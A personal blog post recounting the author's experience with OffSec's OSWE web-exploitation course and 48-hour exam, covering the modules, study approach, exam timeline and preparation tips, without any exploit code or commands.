tonyharris.io

OSWE: Web-300 Course & Exam Writeup

Posted on Oct 6, 2025

I recently earned OffSec’s OSWE Cert and wanted to write a quick post about the course, exam and experience in general as I find these kinds of posts really useful in choosing my next certificate.

TL;DR

Great experience overall, covers quite a lot of web attack classes. Good for anyone with the basics in web attacks. Some sections of the course feel a bit outdated but it’s all still relevant. Quite a gruelling exam as to be expected from OffSec, but a valuable experience.

What is OSWE?

OSWE (OffSec Web Expert) is the more advanced web certification from Offsec, with a focus on white-box testing - so you have access to the source code. The exam is a 48 hour proctored session where you have to bypass auth and get RCE on two webapps, then you have another 24 hours to produce a report detailing how you did it.

Course Structure & Content

It’s about a dozen modules, each one like a long blog post, focusing on one application and starting with an auth bypass attack to get initial access, then at least one more to get RCE. With each module, you get a VM to follow along with hosting the vulnerable application. There are tasks to do and ‘extra mile’ activities which push things further. There are also videos for each.

Most of the modules are white-box, but there are a couple of black-box too. Some of the featured vulns/topics in the modules are:

  • SQLi
  • insecure deserialization
  • server-side template injection
  • insecure random number generation
  • XML external entity injection
  • insecure password reset
  • cross-site request forgery
  • exploiting microservices
  • prototype pollution
  • exploiting dangerous functions
  • bypassing WAF rules/custom filters

You also have a few challenge boxes that don’t have an associated walkthrough, that you can attack as prep for the exam. There are some modules where you decompile Java or .NET applications and others where you have the full source to work with.

My Experience

Overall, I thought the course was great. I only had 3 months lab access and it was a bit of a push, but doable. I probably averaged 10h a week of study. I completed most of the basic tasks and practically none of the extra miles, and skipped the most basic tasks completely. As well as taking in the course content, I did 4 challenge boxes, leaning on the discord to tell if I was in a rabbit hole, again to save time.

I also did a few HTB boxes that I read were OSWE-like:

  • Celestial
  • Falafel
  • json
  • Vault
  • Popcorn
  • Blocky

There are two ways I think this course could be improved. First, I think some modules could do with an update. While it’s nice to walk through real CVEs and their discovery, some of them were 5+ years old.

Also I think OffSec has developed a lot in its course delivery (e.g. letting you launch custom VMs at the end of a section of text, to let you practise a technique and get a flag) and this course lacks this interactivity and feels a bit dusty compared to OSCP.

Second, there’s a module on prototype pollution that I think is a bit too dense - it starts off well-paced and clear, but as it goes on it feels rushed as it explains complex concepts too quickly for my taste - like someone rushing to get to the end of writing an essay. I used other sources like portswigger for prototype pollution, and found them better overall.

Apart from those minor points, the course was great. Some of the XSS and SQLi attacks were particularly enjoyable, and all of the content is relevant - blogs from ppl like watchtowr are covering some of the exact same techniques in 2025.

The Exam

I started at 8AM and there was a bit of a delay as the kick-off email didn’t arrive. Luckily, support was very responsive - I opened a chat, they resent to a different address and I was up and running by 8:30, plus they extended my time by half an hour which took the pressure off a bit.

I spent the first 90 minutes or so just trying to attach the remote debugger to the debug machine and get the webapp started. I was taking my time and trying not to rush and in the first couple of hours I found the first vuln. However, there were clearly two possible paths to follow so I investigated both which took a few hours.

By 8PM I had zero flags and was feeling somewhat deflated. I went outside for a quick walk. This was really useful as when I came back, it was obvious which path I had to take. I wasn’t too confident coming in to the exam, with a rushed preparation, but pushed through with trying different payloads and trying to work around the defences I was seeing in the source code. Got the first flag at 10PM, after 14 hours of work… I can’t describe how pleased I was.

The second was easy, got it in an hour, so that was the first machine done. I once read a quote from Murakami where he said he only stops writing for the day when he knows what will happen next in the story. That way, his subconscious can work on devloping it before he writes again. In that vein, I knew that I should stop for the day only when I knew what the next attack should be. So I started enumerating the second machine. By 2:30 AM, I knew what the next attack would be, so got some sleep.

I could only sleep for 3 hours, so at 5:30 AM I got up and went back to it. The auth bypass for the second machine was pretty easy and it was clear to me what the second vulnerability would be. However, there was a protection in the source that I just couldn’t bypass. I spent so long trying and failing. Then it occured to me…. just google the line of code that I’m struggling to bypass. Sure enough, there was a blog post on how to bypass this protection. I used the technique and it worked a charm.

It’s now 20:30 on the second day, just under 12 hours left and I have all the flags. But with OSWE, that’s just the start. You also have to write a script for each machine that exploits everything automatically. By hand, with no use of AI. I had some boilerplate code prepared for this and most of it was fine, but in my prep, I had overlooked the fact that with one script I will have to open a netcat listener, trigger the exploit and give the user a shell. Figuring this out took a while and during this period I spent a lot of time on 15 year old stack overflow posts. But it all came together in the end.

At about 3AM, I had both my scripts working perfectly and was confident that I had all the commands and screenshots I needed for the report. I ended my exam, got some sleep and wrote the report the following day. A couple of days later, I got confirmation that I had passed.

Tips

  • Get your boilerplate code sorted, including one script that listens with netcat, launches an exploit and gives you a shell
  • Make sure you can easily connect to remote debugging in all the languages covered in the course
  • Set up your terminals so they log every command and all output, just in case you lose something for the report
  • Try to get lab access for longer than 3 months
  • Take regular breaks in the exam to clear your mind and get perspective
  • Supplement the learning materials with other sources like portswigger, hack the box etc where you need it
  • Get on the discord as soon as your access starts, it’s v useful